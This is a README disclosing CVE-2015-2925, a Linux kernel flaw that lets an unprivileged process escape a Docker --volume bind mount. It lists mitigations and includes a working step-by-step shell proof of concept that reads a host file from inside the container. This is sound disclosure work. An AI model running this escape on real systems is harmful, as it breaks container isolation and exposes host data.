└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | # Docker + CVE-2015-2925 = escaping from --volume
 2 | 
 3 | [Recent vulnerability in Linux](http://www.openwall.com/lists/oss-security/2015/04/03/7) known for about half of the year (several months publicly) made it possible to escape from bind mounts. In particular in case of Docker it's possible to escape from inside the directory mounted via `--volume` option to the appropriate host's filesystem.
 4 | 
 5 | Docker Security Team [is already aware](http://www.openwall.com/lists/oss-security/2015/05/07/10) of the issue and allowed to publish this in order to attract public attention.
 6 | 
 7 | Thanks to [Jann Horn](https://github.com/thejh) for poining this out, basically I just reproduced it.
 8 | 
 9 | ## Mitigation
10 | 
11 | Any of this will be sufficient:
12 | 
13 | * AppArmor-enabled kernel and AppArmor Docker profile
14 | * SELinux-enabled kernel and SELinux Docker policy
15 | * Disabled user namespaces in kernel
16 | 
17 | ## Notes
18 | 
19 | * This is not fixed in upstream and distros yet and should work on any recent kernel
20 | * This doesn't require root inside the container
21 | * Distros provide different versions of util-linux package which unshare(1) is part of and it might return "Operation not permitted" in your case; package from Debian Jessie was tested to work as expected
22 | 
23 | ## Proof of concept
24 | 
25 | ```
26 | # uname -r
27 | 3.18.9-aufs
28 | # zgrep USER_NS /proc/config.gz
29 | CONFIG_USER_NS=y
30 | # docker -v
31 | Docker version 1.6.1, build 97cd073
32 | # docker pull debian:jessie
33 | # mkdir /test && chmod 777 /test
34 | # echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
35 | # docker run -i -t --rm -v /test:/test -u nobody debian:jessie
36 | nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
37 | root@fc8925af0f19:/# cd /test
38 | root@fc8925af0f19:/test# mkdir A A/B C D
39 | root@fc8925af0f19:/test# mount --bind A D
40 | root@fc8925af0f19:/test# cd D/B
41 | root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
42 | root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
43 | escaped
44 | ```
45 | 


--------------------------------------------------------------------------------